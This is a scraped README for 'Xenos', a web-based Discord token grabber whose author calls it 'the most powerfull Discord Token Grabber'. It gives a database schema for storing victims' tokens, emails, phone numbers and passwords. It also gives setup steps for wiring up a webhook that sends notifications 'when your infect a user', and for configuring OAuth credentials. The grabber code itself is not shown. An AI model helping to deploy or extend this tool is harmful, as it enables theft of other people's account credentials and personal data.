KanekiWeb / Xenos

🐺 Official repository of Xenos, a token grabber and token manager in web, can't delete your webhook, just ratelimit it :/
https://kanekiweb.tk/
GNU General Public License v3.0
220 stars 73 forks source link
discord discord-grabber discord-logger discord-token discord-token-grabber web

🐺 Xenos Grabber 🐺

The most powerfull Discord Token Grabber

Join my Discord Serveur




Features

How to use Xenos

CREATE TABLE tokens ( user_id text NOT NULL, username text NOT NULL, avatar text NOT NULL, email text NOT NULL, phone text NOT NULL, badges int(10) NOT NULL, nitro_badges int(10) NOT NULL, twofactor varchar(100) NOT NULL, token text NOT NULL, isflaged int(10) NOT NULL, password varchar(100) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8;

ALTER TABLE gifts ADD PRIMARY KEY (id);

ALTER TABLE gifts MODIFY id int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5; COMMIT;


- - Then go to `Inc/database.php` and put your __hostname, database, username, password__
  - Open `Inc/fonctions.php` and put:
    - At line 5 replace `PASSWORD FOR API` by a **password** for using our api and remove a token
    - At line 6 replace `YOUR DISCORD WEBHOOK` by your webhook for receive notifications when your infect a user
    - At line 9 & 10 Go to https://discord.com/developers then create an applcation
    - In Click on your application in Oauth2 Section Copy the Client ID and Client Secret
    - At line 11 replace `yoursite.com` by your website url and on https://discord.com/developers on your application in oauth section create a redirect and paste `http://yoursite.com/async/login` *(with your website please your are not stupid)*
    - For end just add your id at the line 12, for each id separated by `,` <br>(exemple: `array("922450497074495539", "957329295603269652")`)

- Put a stars and follow me for more ❤️

### Grabber Demo:
> ![](https://cdn.discordapp.com/attachments/931632899709620254/965005206209302528/unknown.png)
### Connection Notification Demo:
> ![](https://cdn.discordapp.com/attachments/931632899709620254/965018184325402675/unknown.png)
### Home Page Demo:
> ![](https://media.discordapp.net/attachments/931632899709620254/965018381138931712/unknown.png?width=1394&height=682)

<p align="center">
  <img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat" alt="Contribution Welcome">
  <img src="https://img.shields.io/badge/License-GPLv3-blue.svg" alt="License Badge">
  <img src="https://badges.frapsoft.com/os/v3/open-source.svg?v=103" alt="Open Source">
  <img src="https://visitor-badge.laobi.icu/badge?page_id=KanekiWeb.Xenos" alt="Visitor Count">
</p>